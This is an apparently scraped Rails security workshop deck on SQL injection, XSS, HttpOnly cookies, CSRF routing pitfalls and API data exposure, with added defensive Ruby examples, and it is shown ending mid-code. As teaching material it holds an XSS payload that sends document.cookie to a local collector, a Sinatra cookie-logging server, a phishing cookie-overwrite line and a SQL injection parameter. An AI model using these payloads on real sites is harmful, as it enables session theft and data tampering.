Web applications hacking
Ruby on Rails example
ABOUT US:
● Software House located in Krakow
● Ruby on Rails, Android and iOS
● Specialized in building web and mobile applications
● Collaborating with many companies and startups from all over the world
OUR HISTORY:
2009 - software house was founded
50 projects created
40 developers
Awards:
Top Web & Software Developers in Poland 2015
Top Tens Ruby on Rails Development Companies
HOMEAHEAD
PROEST
Software for
gastronomy
OWASP TOP 10
1. Injection
2. Broken authentication and session management
3. Cross-Site Scripting
4. Insecure direct object reference
5. Security misconfiguration
6. Sensitive data exposure
7. Missing function level access control
8. Cross-Site Request Forgery
9. Using components with known vulnerabilities
10. Unvalidated redirects and forwards
Target Application
Simple Ruby on Rails forum
Ruby 2.3.0
Rails 4.2.6
PostgreSQL 9.4
PostgreSQL Database schema
SEARCHING THE FORUM THREAD BY TITLE (hash form):

# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
  def show
    # Hash form: Active Record quotes the value, so params[:title] is bound safely
    @thread = ForumThread.find_by title: params[:title]
  end
end

# config/routes.rb
resources :forum_threads, param: :title, only: :show do
  resources :comments, only: :create
end
SEARCHING THE FORUM THREAD BY TITLE (string interpolation):

# app/controllers/forum_threads_controller.rb
class ForumThreadsController < ApplicationController
  def show
    # String form with Ruby interpolation: params[:title] lands in the SQL unquoted
    @thread = ForumThread.find_by "title = #{params[:title]}"
  end
end

# config/routes.rb
resources :forum_threads, param: :title, only: :show do
  resources :comments, only: :create
end
Is SQL injection
impossible in Rails?
Unfortunately, no.
It’s possible,
just not dropping tables.
Further reading:
rails-sqli.org
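The two versions of `show` above differ in one character pattern: a double-quoted SQL fragment with `#{...}` inside it. That pattern is easy to grep for during code review. The following is an added example, not code from the workshop or from Rails: a small heuristic scanner that flags Active Record query methods (the method list follows rails-sqli.org) called with an interpolated string literal. The two controller snippets it scans are copied from the slides above as constructed inline input; the third sample is made up for the test. It is a regex, not a Ruby parser, so it will miss fragments built in a variable before the call and will flag an interpolation even when the interpolated value is a constant.

```ruby
# Added example: code-review helper that flags interpolated SQL fragments
# passed to Active Record query methods. Heuristic, line-based, no parser.

# Query methods that accept raw SQL fragments (list after rails-sqli.org)
QUERY_METHODS = %w[
  find_by! find_by where rewhere exists? select pluck order reorder group having
  joins from lock calculate count sum average minimum maximum delete_all update_all
].freeze

# A double-quoted literal right after one of the methods with "#{" inside it.
# Single-quoted literals cannot interpolate, so they are not matched.
INTERPOLATED_SQL = Regexp.new(
  '\b(' + QUERY_METHODS.map { |m| Regexp.escape(m) }.join('|') + ')\s*\(?\s*"[^"]*#\{'
).freeze

# Returns one finding per offending line: { path:, line:, method:, code: }
def scan_for_interpolated_sql(source, path: '(inline)')
  findings = []
  source.each_line.with_index(1) do |line, lineno|
    next if line.lstrip.start_with?('#')          # comment lines are not code
    m = INTERPOLATED_SQL.match(line)
    next unless m
    findings << { path: path, line: lineno, method: m[1], code: line.strip }
  end
  findings
end

# Constructed inputs: the two controllers from the slides (single-quoted
# heredocs keep the "#{...}" literal) plus a mixed sample.
SAFE_CONTROLLER = <<~'RUBY'
  class ForumThreadsController < ApplicationController
    def show
      @thread = ForumThread.find_by title: params[:title]
    end
  end
RUBY

UNSAFE_CONTROLLER = <<~'RUBY'
  class ForumThreadsController < ApplicationController
    def show
      @thread = ForumThread.find_by "title = #{params[:title]}"
    end
  end
RUBY

MIXED_SAMPLE = <<~'RUBY'
  users = User.where("name = '#{params[:name]}'")
  users = User.where("name = ?", params[:name])
  users = User.order("#{params[:sort]} DESC")
  users = User.order(created_at: :desc)
  # User.where("id = #{id}") -- commented out, ignored
RUBY

if __FILE__ == $PROGRAM_NAME
  { 'safe' => SAFE_CONTROLLER, 'unsafe' => UNSAFE_CONTROLLER, 'mixed' => MIXED_SAMPLE }.each do |name, src|
    scan_for_interpolated_sql(src, path: name).each do |f|
      puts "#{f[:path]}:#{f[:line]}: #{f[:method]} with interpolated SQL -> #{f[:code]}"
    end
  end
end
```

Run it over `app/` in CI (`Dir.glob('app/**/*.rb')` feeding `scan_for_interpolated_sql(File.read(path), path: path)`) and treat any finding as a review comment; the placeholder form `where("name = ?", value)` and the hash form pass, because neither contains `#{`.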
COMMENTS - create and show:

# app/controllers/comments_controller.rb
class CommentsController < ApplicationController
  def create
    @thread = ForumThread.find params[:forum_thread_id]
    @comment = @thread.comments.build comment_params
    @comment.user = current_user
    if @comment.save
      redirect_to @thread, notice: 'Successfully added new comment'
    else
      redirect_to @thread, alert: "Couldn't save comment"
    end
  end

  private

  # Strong parameters: only :content is accepted from the form
  def comment_params
    params.require(:comment).permit(:content)
  end
end

# app/views/forum_threads/show.haml
-# Haml escapes "=" output by default, so tags in the comment text are shown literally
%p= comment.content
COMMENTS - create and show (raw output):

# app/controllers/comments_controller.rb
# (unchanged from the previous slide)

# app/views/forum_threads/show.haml
-# html_safe marks the string as trusted: Haml outputs it without escaping
%p= comment.content.html_safe
XSS ATTACK - TEST AND STEALING COOKIES

<!-- XSS test -->
Hi guys!
<script> alert("I came for your cookies!") </script>

<!-- Time to get some cookies! -->
What's up?
<script>
  xhttp = new XMLHttpRequest();
  xhttp.open("GET", "http://localhost:4567/cookies/" + document.cookie);
  xhttp.send();
</script>
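The difference between `%p= comment.content` and `%p= comment.content.html_safe` is not in the view but in the output buffer: Rails' `ActiveSupport::SafeBuffer` escapes every string appended to it unless that string was marked trusted, and `html_safe` is exactly that mark. The following is an added example, not code from the slides or from Rails: a minimal model of that one rule (a `TrustedString` class stands in for a string marked `html_safe`, `OutputBuffer` for the view buffer, `ERB::Util.html_escape` from the standard library does the escaping), run over the "XSS test" comment shown above. `sanitize` is not modelled; it needs the Loofah-based sanitizer Rails ships.

```ruby
# Added example: why html_safe turns escaping off. Models the one rule of
# ActiveSupport::SafeBuffer that matters here, nothing else.
require 'erb'

# Stands in for a String that has been marked .html_safe
class TrustedString < String
end

# Stand-in for String#html_safe: the string is now trusted, whatever it contains
def html_safe(str)
  TrustedString.new(str)
end

# Stand-in for the view's output buffer
class OutputBuffer
  def initialize
    @html = +''
  end

  # Like SafeBuffer#<<: untrusted strings are escaped, trusted ones pass through raw
  def <<(str)
    @html << (str.is_a?(TrustedString) ? str.to_s : ERB::Util.html_escape(str))
    self
  end

  def to_s
    @html.dup
  end
end

# Renders the <p> from the slides' show.haml for one comment body.
# The tag markup is trusted (it comes from the template); the body is whatever was passed.
def render_comment(content)
  buf = OutputBuffer.new
  buf << html_safe('<p>') << content << html_safe('</p>')
  buf.to_s
end

# Constructed input: the "XSS test" comment from the slides
XSS_TEST_COMMENT = 'Hi guys! <script> alert("I came for your cookies!") </script>'.freeze

# %p= comment.content  -> body is untrusted, gets escaped
def render_escaped
  render_comment(XSS_TEST_COMMENT)
end

# %p= comment.content.html_safe  -> body is marked trusted, emitted as-is
def render_unsafe
  render_comment(html_safe(XSS_TEST_COMMENT))
end

if __FILE__ == $PROGRAM_NAME
  puts "escaped:  #{render_escaped}"
  puts "html_safe: #{render_unsafe}"
end
```

The point to take from the model: `html_safe` does not inspect the string, it only flips a flag, so calling it on user-supplied content is a statement that the content has already been made safe by something else (which is what `sanitize` is for).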
XSS ATTACK - SIMPLE COOKIES LOGGING SERVER

require 'sinatra'
require 'logger'

logger = Logger.new 'log/cookies.log'

# Sinatra listens on port 4567 by default, the port used in the payload above
get '/cookies/:cookie' do
  logger.info '=== COOKIE ==='
  logger.info params[:cookie]
  logger.info '/== COOKIE ==='
end
Are all cookies HttpOnly in Rails?

# plain cookie: readable and writable from JavaScript
cookies[:after_sign_in_path] = 'http://localhost/after_sign_in_path'
# JS: document.cookie = "after_sign_in_path='http://malicious.site/phishing'"

# signed cookie: tamper-evident on the server, but still readable from JavaScript
cookies.signed[:after_sign_in_path] = 'http://localhost/after_sign_in_path'
# JS: document.cookie = "after_sign_in_path='http://malicious.site/phishing'"

# signed and HttpOnly: not exposed through document.cookie at all
cookies.signed[:after_sign_in_path] = {
  value: 'http://localhost/after_sign_in_path',
  httponly: true
}
# finally safe

UNFORTUNATELY - NO. ALWAYS USE THIS HASH!
It’s safe from cookies stealing,
but is it safe from XSS?
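Whether a cookie actually went out with `HttpOnly` is visible in the response's `Set-Cookie` headers, so it can be checked without a browser. The following is an added example, not code from the slides: a standard-library-only parser for `Set-Cookie` header values and an audit that reports cookies JavaScript could read (no `HttpOnly`) and, as a related caveat, cookies that would also travel over plain HTTP (no `Secure`). The three header lines are constructed samples in the shape the slides discuss (a session cookie and the `after_sign_in_path` cookie with and without the hash form); point it at your own app's responses, e.g. the headers of a captured login response.

```ruby
# Added example: audit Set-Cookie headers for HttpOnly / Secure.

# Parses one Set-Cookie header value into name, value and lower-cased attributes.
# Attribute flags without a value (HttpOnly, Secure) are stored as true.
def parse_set_cookie(header_value)
  parts = header_value.split(';').map(&:strip)
  name, value = parts.shift.split('=', 2)
  attrs = parts.map do |p|
    k, v = p.split('=', 2)
    [k.downcase, v.nil? ? true : v]
  end.to_h
  { name: name, value: value, attrs: attrs }
end

# Returns one entry per cookie with the list of missing protections.
def audit_cookies(set_cookie_headers)
  set_cookie_headers.map do |h|
    c = parse_set_cookie(h)
    issues = []
    issues << :no_httponly unless c[:attrs]['httponly']   # readable via document.cookie
    issues << :no_secure   unless c[:attrs]['secure']     # sent over plain HTTP too
    { name: c[:name], issues: issues }
  end
end

# Convenience check for a single header value
def readable_by_js?(header_value)
  !parse_set_cookie(header_value)[:attrs]['httponly']
end

# Constructed sample headers (values are placeholders, not real session data)
SAMPLE_HEADERS = [
  '_forum_session=PLACEHOLDER--abc123; path=/; HttpOnly; Secure',
  'after_sign_in_path=http%3A%2F%2Flocalhost%2Fafter_sign_in_path; path=/',
  'after_sign_in_path=http%3A%2F%2Flocalhost%2Fafter_sign_in_path; path=/; HttpOnly; Secure'
].freeze

if __FILE__ == $PROGRAM_NAME
  audit_cookies(SAMPLE_HEADERS).each do |r|
    status = r[:issues].empty? ? 'ok' : r[:issues].join(', ')
    puts "#{r[:name]}: #{status}"
  end
end
```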
COMMENTS - create and show (sanitized output):

# app/controllers/comments_controller.rb
# (unchanged from the previous slide)

# app/views/forum_threads/show.haml
-# sanitize strips tags and attributes that are not on Rails' allow list
%p= sanitize comment.content.html_safe
Further reading:
molily.de/xss/
DEFAULT CSRF PROTECTION IN RAILS:

# app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs you may want to use :null_session instead.
  protect_from_forgery with: :exception
end
Is Rails CSRF protection
unbreakable?
HTTP Verbs
● GET
● POST
● PUT
● PATCH
● DELETE
● HEAD
● OPTIONS
● TRACE
● CONNECT
HTTP Verbs NOT protected by Rails CSRF
● GET
● POST
● PUT
● PATCH
● DELETE
● HEAD
● OPTIONS
● TRACE
● CONNECT
CSRF pitfall in Rails routing

CSRF PITFALL IN RAILS ROUTING - MATCH:

# config/routes.rb
match '/forum_threads/:forum_thread_id/comments/:id/update',
  to: 'comments#update',
  via: :all # Rails 4+ requires an explicit :via; :all makes the action reachable by GET too
Is Rails CSRF protection 100% safe?
Yes, it is - as long as you stay close to the Rails guides.
Further reading:
https://rorsecurity.info/portfolio/cross-site-request-forgery-and-rails
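The pitfall above comes from two behaviours meeting: `protect_from_forgery` skips token verification for GET and HEAD requests (`ActionController::RequestForgeryProtection#verified_request?`), and `match ... via: :all` makes a state-changing action answer GET. The following is an added example, not Rails code and not from the slides: a toy route table and dispatcher in plain Ruby that model only those two rules (the `Route` struct, `dispatch` and the token compare are simplified stand-ins), contrasting the `resources`-style route, which refuses GET with a routing error, with the `match`/`via: :all` route, which runs `comments#update` on a GET without any token.

```ruby
# Added example: model of route verb restrictions meeting Rails' CSRF check.
# Only two facts about Rails are modelled: resources routes restrict the verb,
# and the CSRF token is not verified on GET/HEAD. Everything else is a stand-in.

ALL_VERBS       = %i[get post put patch delete head options trace connect].freeze
CSRF_SAFE_VERBS = %i[get head].freeze   # verified_request? returns true for these

Route = Struct.new(:path, :via, :action)

# Stand-in for config/routes.rb: update via resources accepts PATCH/PUT only,
# the slides' "match ... via: :all" accepts every verb.
ROUTES_RESOURCES = [
  Route.new('/forum_threads/1/comments/5', %i[patch put], 'comments#update')
].freeze
ROUTES_MATCH_ALL = [
  Route.new('/forum_threads/1/comments/5/update', ALL_VERBS, 'comments#update')
].freeze

# Simplified verified_request?: GET/HEAD pass; other verbs need a token equal to
# the session's (real Rails also accepts the X-CSRF-Token header and masks tokens).
def verified_request?(verb, param_token, session_token)
  CSRF_SAFE_VERBS.include?(verb) || (!param_token.nil? && param_token == session_token)
end

# Routes the request, then runs the forgery check, and returns the outcome:
#   :routing_error, :invalid_authenticity_token, or [:executed, action]
def dispatch(routes, verb:, path:, param_token: nil, session_token: 'session-token')
  route = routes.find { |r| r.path == path && r.via.include?(verb) }
  return :routing_error unless route
  return :invalid_authenticity_token unless verified_request?(verb, param_token, session_token)
  [:executed, route.action]
end

# A cross-site request carries the victim's session cookie but no token and,
# from a link or image tag, is a GET.
def cross_site_get_via_resources
  dispatch(ROUTES_RESOURCES, verb: :get, path: '/forum_threads/1/comments/5')
end

def cross_site_get_via_match_all
  dispatch(ROUTES_MATCH_ALL, verb: :get, path: '/forum_threads/1/comments/5/update')
end

def cross_site_patch_without_token
  dispatch(ROUTES_RESOURCES, verb: :patch, path: '/forum_threads/1/comments/5')
end

def same_site_patch_with_token
  dispatch(ROUTES_RESOURCES, verb: :patch, path: '/forum_threads/1/comments/5',
           param_token: 'session-token')
end

if __FILE__ == $PROGRAM_NAME
  puts "GET   via resources : #{cross_site_get_via_resources.inspect}"
  puts "GET   via match/all : #{cross_site_get_via_match_all.inspect}"
  puts "PATCH without token : #{cross_site_patch_without_token.inspect}"
  puts "PATCH with token    : #{same_site_patch_with_token.inspect}"
end
```

The fix is in the router, not in the controller: declare the verb (`patch '/.../update', to: 'comments#update'` or the `resources` form) so that GET never reaches an action that changes state, and the token check then applies to every request that does.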
Sensitive data exposure
1. Credentials leaking to public repositories.
2. Lack of proper in-app authorization.
3. Debugging information in production environments.
4. Access not restricted, wrong access privileges.
5. Lack of encryption.
6. API responses containing sensitive data.
Protecting against sensitive data exposure
1. Code reviews.
2. Careful authorization.
3. Strict access.
4. Encryption.
5. API exposing only necessary information.
Creating the secure API

GENERATED RAILS API:

# app/controllers/forum_threads_controller.rb
def index
  @threads = ForumThread.order(updated_at: :desc)
  respond_to do |format|
    format.html
    format.json { render json: @threads }   # serializes every column of every row
  end
end
GENERATED RAILS API - OUTPUT:

[
  {
    "id": 2,
    "title": "Curabitur vel vulputate libero.",
    "created_at": "2016-04-18T10:10:40.648Z",
    "updated_at": "2016-04-18T10:10:40.648Z"
  },
  {
    "id": 1,
    "title": "Lorem ipsum dolor sit amet.",
    "created_at": "2016-04-18T10:10:40.607Z",
    "updated_at": "2016-04-18T10:10:40.607Z"
  }
]
GENERATED RAILS API - SECURING THE OUTPUT:

# app/controllers/forum_threads_controller.rb
def index
  @threads = ForumThread.order(updated_at: :desc)
  respond_to do |format|
    format.html
    # to_json(only: ...) keeps just the listed attributes. Relation#only filters
    # query clauses, not columns, so @threads.only(:title) would not restrict the output.
    format.json { render json: @threads.to_json(only: :title) }
  end
end
GENERATED RAILS API - SECURED OUTPUT:

[
  {
    "title": "Curabitur vel vulputate libero."
  },
  {
    "title": "Lorem ipsum dolor sit amet."
  }
]
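Restricting the output to `title` fixes this one action; the reusable form of the same idea is an explicit per-model allow-list of public attributes plus a test that asserts no forbidden key can reach a response. The following is an added example, not code from the slides or from Rails: a plain-Ruby stand-in for the model (a `Struct` whose `to_h` plays the record's attributes, with a constructed `author_email` column to have something worth leaking), an allow-list serializer, and a response-shape check that walks the parsed JSON. In the app itself the equivalent of `serialize` is `render json: @threads, only: [:title]`, since `render json:` passes its options to `to_json`.

```ruby
# Added example: attribute allow-list serialization and a response-shape check.
require 'json'

# Stand-in for the ActiveRecord model; positional Struct so it runs on older Rubies
ForumThread = Struct.new(:id, :title, :author_email, :created_at, :updated_at)

# Constructed sample rows, modelled on the JSON shown in the slides
THREADS = [
  ForumThread.new(2, 'Curabitur vel vulputate libero.', 'bob@example.test',
                  '2016-04-18T10:10:40.648Z', '2016-04-18T10:10:40.648Z'),
  ForumThread.new(1, 'Lorem ipsum dolor sit amet.', 'alice@example.test',
                  '2016-04-18T10:10:40.607Z', '2016-04-18T10:10:40.607Z')
].freeze

# What each model may expose through the public API. Anything not listed never leaves.
PUBLIC_ATTRIBUTES = { ForumThread => %i[title] }.freeze

# Allow-list serializer: `only:` overrides the default list for a specific endpoint
def serialize(records, only: nil)
  records.map do |r|
    allowed = only || PUBLIC_ATTRIBUTES.fetch(r.class)
    r.to_h.select { |k, _| allowed.include?(k) }
  end
end

# Equivalent of `render json: @threads`: every attribute of every row
def threads_json_unfiltered
  JSON.generate(THREADS.map(&:to_h))
end

# Equivalent of `render json: @threads, only: [:title]`
def threads_json_secured
  JSON.generate(serialize(THREADS))
end

# Keys that must never appear in any API response (extend for your schema)
FORBIDDEN_KEYS = %w[author_email password_digest encrypted_password].freeze

# Response-shape check for a test suite: true if a forbidden key appears at any depth
def leaks_sensitive_keys?(json)
  walk = lambda do |node|
    case node
    when Hash  then node.any? { |k, v| FORBIDDEN_KEYS.include?(k.to_s) || walk.call(v) }
    when Array then node.any? { |v| walk.call(v) }
    else false
    end
  end
  walk.call(JSON.parse(json))
end

if __FILE__ == $PROGRAM_NAME
  puts "unfiltered leaks: #{leaks_sensitive_keys?(threads_json_unfiltered)}"
  puts "secured leaks:    #{leaks_sensitive_keys?(threads_json_secured)}"
  puts threads_json_secured
end
```

`leaks_sensitive_keys?` belongs in a request spec that hits each JSON endpoint, so that a later change such as adding a column to the model, or someone swapping `only:` for `except:`, fails the build instead of shipping.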
Solutions for building pretty, secure APIs
Active Model Serializers
● Object Oriented approach
● Ability to define decorating methods
● All Ruby!
● Flexible
● Easy to test
● Adapter to follow JSON API v1.0 schema
● YARD documented
Jbuilder
● Templates approach
● ERB-like - might be easy for newcomers
● Flexible
● Hard to test
● No real "adapter" - if you want JSON API v1.0, you have to do it by yourself
Summary
Things to remember from this workshop:
1. Never trust anything that comes from the user. Params, cookies, headers,
everything. Nothing that comes from the user is safe to use.
2. Always sanitize your HTML output. Especially when you allow links or images
that come from the user.
3. Be careful with match routing. Just don't use it if you don't have to.
4. Inspect your outputs. Return only necessary information from your API.
5. Last but not least: get someone to review your code.
Thank you for your attention.
Na zjeździe 11
30-527 Krakow, Poland
tel: +48 12 391 60 76
Silicon Valley
Acceleration Center.
180 Sansome Street
San Francisco, CA 94104
tel: 1-415-449-4791
info@railwaymen.org
www.railwaymen.org
@Railwaymen_org
railwaymen.software.development
/company/railwaymen

Workshop KrakYourNet2016 - Web applications hacking Ruby on Rails example

  • 1. Web applications hacking Ruby on Rails example
  • 2. ● Software House located in Krakow ● Ruby on Rails, Android and iOS ● Specialized in building web and mobile applications ● Collaborating with many companies and startups from all over the world ABOUT US:
  • 3. 2009 - software house was founded 50 projects created 40 developers Awards: OUR HISTORY: Top Web & Software Developers in Poland 2015 Top Tens Ruby on Rails Development Companies
  • 8. OWASP TOP 10 (2013 edition)
      1. Injection
      2. Broken authentication and session management
      3. Cross-Site Scripting
      4. Insecure direct object reference
      5. Security misconfiguration
      6. Sensitive data exposure
      7. Missing function level access control
      8. Cross-Site Request Forgery
      9. Using components with known vulnerabilities
      10. Unvalidated redirects and forwards
  • 10. Simple Ruby on Rails forum
      Ruby 2.3.0
      Rails 4.2.6
      PostgreSQL 9.4
  • 15. SEARCHING THE FORUM THREAD BY TITLE:

      # app/controllers/forum_threads_controller.rb
      class ForumThreadsController < ApplicationController
        def show
          # Hash form: ActiveRecord binds the value, so params[:title] is quoted
          # before it reaches PostgreSQL.
          @thread = ForumThread.find_by title: params[:title]
        end
      end

      # config/routes.rb
      resources :forum_threads, param: :title, only: :show do
        resources :comments, only: :create
      end
  • 17. SEARCHING THE FORUM THREAD BY TITLE:

      # app/controllers/forum_threads_controller.rb
      class ForumThreadsController < ApplicationController
        def show
          # String form: whatever arrives in params[:title] is spliced into the
          # WHERE clause unquoted, so the parameter can carry its own SQL.
          @thread = ForumThread.find_by "title = #{params[:title]}"
        end
      end

      # config/routes.rb
      resources :forum_threads, param: :title, only: :show do
        resources :comments, only: :create
      end
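Added example for this page, not the workshop's code: the SQL that the two versions of ForumThreadsController#show (slides 15 and 17) hand to PostgreSQL, and a small source audit that flags string interpolation inside ActiveRecord query methods. `quote` imitates what ActiveRecord does for a bound string value (single quotes around it, embedded single quotes doubled); the table and column names are the forum's own, the method names and the audit are this example's stand-ins.

```ruby
# Slide 17: params[:title] spliced into the fragment exactly as received.
def vulnerable_show_sql(title)
  "SELECT forum_threads.* FROM forum_threads WHERE (title = #{title}) LIMIT 1"
end

# Stand-in for what ActiveRecord's connection.quote does with a String.
def quote(value)
  "'#{value.to_s.gsub("'", "''")}'"
end

# Slide 15: find_by(title: title) or where("title = ?", title) bind the value,
# so the parameter can only ever be a string literal in the query.
def hardened_show_sql(title)
  "SELECT forum_threads.* FROM forum_threads WHERE (title = #{quote(title)}) LIMIT 1"
end

# ActiveRecord methods that accept a raw SQL fragment as a String.
RAW_SQL_METHODS = %w[where find_by order reorder group having select joins pluck exists?].freeze

# Returns [[line_number, line], ...] for every line that calls one of the
# methods above with a double-quoted string containing #{...} interpolation.
# A regex review aid, not a parser: it does not see fragments built with +,
# format, or assembled in a variable before the call.
def audit_interpolated_queries(source)
  names = RAW_SQL_METHODS.map { |m| Regexp.escape(m) }.join("|")
  pattern = /\b(?:#{names})\s*\(?\s*"[^"]*\#\{/
  source.each_line.with_index(1).each_with_object([]) do |(line, number), hits|
    hits << [number, line.strip] if line =~ pattern
  end
end

if $PROGRAM_NAME == __FILE__
  payload = "'' OR 1=1 --"               # constructed request parameter
  puts vulnerable_show_sql(payload)      # the OR 1=1 is part of the query
  puts hardened_show_sql(payload)        # the whole payload is one literal
end
```

The audit is what a reviewer would run over app/ and lib/ before a release; on the slide's controller it reports exactly the `find_by "title = #{...}"` line and stays silent on the hash and placeholder forms.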
  • 24. COMMENTS - create and show:

      # app/controllers/comments_controller.rb
      class CommentsController < ApplicationController
        def create
          @thread = ForumThread.find params[:forum_thread_id]
          @comment = @thread.comments.build comment_params
          @comment.user = current_user
          if @comment.save
            redirect_to @thread, notice: 'Successfully added new comment'
          else
            redirect_to @thread, alert: "Couldn't save comment"
          end
        end

        private

        def comment_params
          params.require(:comment).permit(:content)
        end
      end

      # app/views/forum_threads/show.haml
      # HAML escapes the value, so any tags in the comment are shown as text.
      %p= comment.content
  • 26. COMMENTS - create and show:

      # app/controllers/comments_controller.rb
      class CommentsController < ApplicationController
        def create
          @thread = ForumThread.find params[:forum_thread_id]
          @comment = @thread.comments.build comment_params
          @comment.user = current_user
          if @comment.save
            redirect_to @thread, notice: 'Successfully added new comment'
          else
            redirect_to @thread, alert: "Couldn't save comment"
          end
        end

        private

        def comment_params
          params.require(:comment).permit(:content)
        end
      end

      # app/views/forum_threads/show.haml
      # html_safe marks the string as trusted: whatever HTML the user typed
      # is sent to the browser unescaped.
      %p= comment.content.html_safe
  • 28. XSS ATTACK - TEST AND STEALING COOKIES

      <!-- XSS test -->
      Hi guys!
      <script>
        alert("I came for your cookies!")
      </script>

      <!-- Time to get some cookies! -->
      What's up?
      <script>
        xhttp = new XMLHttpRequest();
        xhttp.open("GET", "http://localhost:4567/cookies/" + document.cookie);
        xhttp.send();
      </script>
  • 29. XSS ATTACK - SIMPLE COOKIES LOGGING SERVER

      require 'sinatra'
      require 'logger'

      # Sinatra listens on port 4567 by default, which is the port in the payload.
      Dir.mkdir 'log' unless Dir.exist? 'log'
      logger = Logger.new 'log/cookies.log'

      get '/cookies/:cookie' do
        logger.info '=== COOKIE ==='
        logger.info params[:cookie]
        logger.info '/== COOKIE ==='
      end
  • 32. Are all cookies HTTPOnly in Rails?
  • 33. UNFORTUNATELY - NO. ALWAYS USE THIS HASH!

      # Plain cookie: any script running on the page can read it and overwrite it.
      cookies[:after_sign_in_path] = 'http://localhost/after_sign_in_path'
      // document.cookie = "after_sign_in_path='http://malicious.site/phishing'"

      # Signed cookie: a forged value fails signature verification on the server,
      # but the cookie is still readable and writable from JavaScript.
      cookies.signed[:after_sign_in_path] = 'http://localhost/after_sign_in_path'
      // document.cookie = "after_sign_in_path='http://malicious.site/phishing'"

      # httponly: true keeps the cookie out of document.cookie altogether.
      cookies.signed[:after_sign_in_path] = {
        value: 'http://localhost/after_sign_in_path',
        httponly: true
      }
      // finally safe

      The Rails session cookie is HttpOnly by default; cookies you set yourself through the cookie jar are not, so the flag has to be passed explicitly every time.
  • 34. It’s safe from cookies stealing, but is it safe from XSS?
  • 35. COMMENTS - create and show:

      # app/controllers/comments_controller.rb
      class CommentsController < ApplicationController
        def create
          @thread = ForumThread.find params[:forum_thread_id]
          @comment = @thread.comments.build comment_params
          @comment.user = current_user
          if @comment.save
            redirect_to @thread, notice: 'Successfully added new comment'
          else
            redirect_to @thread, alert: "Couldn't save comment"
          end
        end

        private

        def comment_params
          params.require(:comment).permit(:content)
        end
      end

      # app/views/forum_threads/show.haml
      # sanitize strips every tag and attribute outside its allowed list
      # (script included) and returns a safe string; the html_safe on the
      # input is redundant, sanitize processes the text either way.
      %p= sanitize comment.content.html_safe
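Added example for this page, not the workshop's code and not the Rails helper. It contrasts the three ways slides 24, 26 and 35 emit a comment: escaped (what `%p= comment.content` does), raw (`.html_safe`), and an allowlist sanitizer in the spirit of `sanitize`. The sanitizer is a deliberately small illustration of the allowlist strategy, written in plain Ruby so it runs without Rails; in an application use rails-html-sanitizer, not this. The tag and attribute lists are this example's own choices.

```ruby
require "erb"

ALLOWED_TAGS  = %w[p br b i strong em a].freeze
ALLOWED_ATTRS = { "a" => %w[href] }.freeze
SAFE_SCHEMES  = %w[http https].freeze

def escape(text)
  ERB::Util.html_escape(text)
end

# Slide 24: HAML escapes the value, so <script> arrives as &lt;script&gt;.
def render_escaped(content)
  "<p>#{escape(content)}</p>"
end

# Slide 26: html_safe switches escaping off; the markup goes out as typed.
def render_raw(content)
  "<p>#{content}</p>"
end

# Keep only allowlisted attributes. href must be an absolute http(s) URL,
# which rejects javascript:, data: and entity-obfuscated schemes; anything
# that is not a quoted name="value" pair is dropped.
def safe_attributes(tag, attr_string)
  allowed = ALLOWED_ATTRS.fetch(tag, [])
  attr_string.scan(/([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/).each_with_object(+"") do |(name, dq, sq), out|
    name = name.downcase
    value = (dq || sq).to_s
    next unless allowed.include?(name)
    next if name == "href" && !SAFE_SCHEMES.include?(value.strip.split(":", 2).first.to_s.downcase)
    out << %( #{name}="#{escape(value)}")
  end
end

# Slide 35: walk the input tag by tag. Allowed tags are rebuilt from scratch
# with only their allowed attributes, any other tag is dropped, and all text
# (including the body of a dropped <script>) is escaped. A stray "<" that is
# not a tag turns the run up to the next ">" into escaped text, which errs
# on the safe side.
def sanitize_html(content)
  content.to_s.split(/(<[^>]*>)/).each_with_object(+"") do |chunk, out|
    match = chunk.match(%r{\A<(/?)([a-zA-Z][a-zA-Z0-9]*)(.*?)/?>\z}m)
    if match.nil?
      out << escape(chunk)
    elsif ALLOWED_TAGS.include?(match[2].downcase)
      tag = match[2].downcase
      out << (match[1].empty? ? "<#{tag}#{safe_attributes(tag, match[3])}>" : "</#{tag}>")
    end
  end
end

if $PROGRAM_NAME == __FILE__
  payload = 'Hi guys! <script>alert("I came for your cookies!")</script>'  # slide 28 test payload
  puts render_raw(payload)       # script tag reaches the browser
  puts render_escaped(payload)   # shown as text
  puts sanitize_html(payload)    # tag dropped, text escaped
end
```

Run against the slide 28 payload, the raw version still contains `<script>`, the escaped version turns it into `&lt;script&gt;`, and the sanitizer drops the tag and escapes what was inside it. A link with `href="javascript:..."` keeps its text but loses the attribute, which is the reason slide 63 says to sanitize especially when links and images are allowed.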
  • 38. DEFAULT CSRF PROTECTION IN RAILS:

      # app/controllers/application_controller.rb
      class ApplicationController < ActionController::Base
        # Prevent CSRF attacks by raising an exception.
        # For APIs you may want to use :null_session instead.
        protect_from_forgery with: :exception
      end
  • 40. Is Rails CSRF protection unbreakable?
  • 41. HTTP Verbs
      ● GET
      ● POST
      ● PUT
      ● PATCH
      ● DELETE
      ● HEAD
      ● OPTIONS
      ● TRACE
      ● CONNECT
  • 42. HTTP Verbs NOT protected by Rails CSRF
      ● GET
      ● HEAD
      Rails' verified_request? returns true without looking at the token whenever request.get? || request.head?; POST, PUT, PATCH, DELETE, OPTIONS, TRACE and CONNECT all have to carry a valid authenticity token.
  • 44. CSRF PITFALL IN RAILS ROUTING - MATCH:

      # config/routes.rb
      # via: :all exposes this state-changing action on every verb, GET
      # included, and GET requests are never CSRF-checked, so a plain link or
      # image tag on another site can trigger the update without a token.
      match '/forum_threads/:forum_thread_id/comments/:id/update',
            to: 'comments#update', via: :all # Rails 4+
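Added example for this page, not the workshop's code and not the Rails API: a plain-Ruby model of the rule Rails 4.2 applies in verified_request? (GET and HEAD are never checked, every other verb needs an authenticity token from the form field or the X-CSRF-Token header equal to the session's), run against the forum's own routes from slides 15 and 44. Request, the route table and dispatch are this example's stand-ins for the router and controller; Rails' per-response masking of the form token is left out.

```ruby
Request = Struct.new(:verb, :path, :params, :headers) do
  def get?
    verb == "GET"
  end

  def head?
    verb == "HEAD"
  end
end

# Constant-time comparison, the idea behind ActiveSupport::SecurityUtils.secure_compare.
def secure_compare(a, b)
  return false unless a.is_a?(String) && b.is_a?(String) && a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Rails 4.2: request.get? || request.head? || valid_authenticity_token?(...)
def verified_request?(request, session_token)
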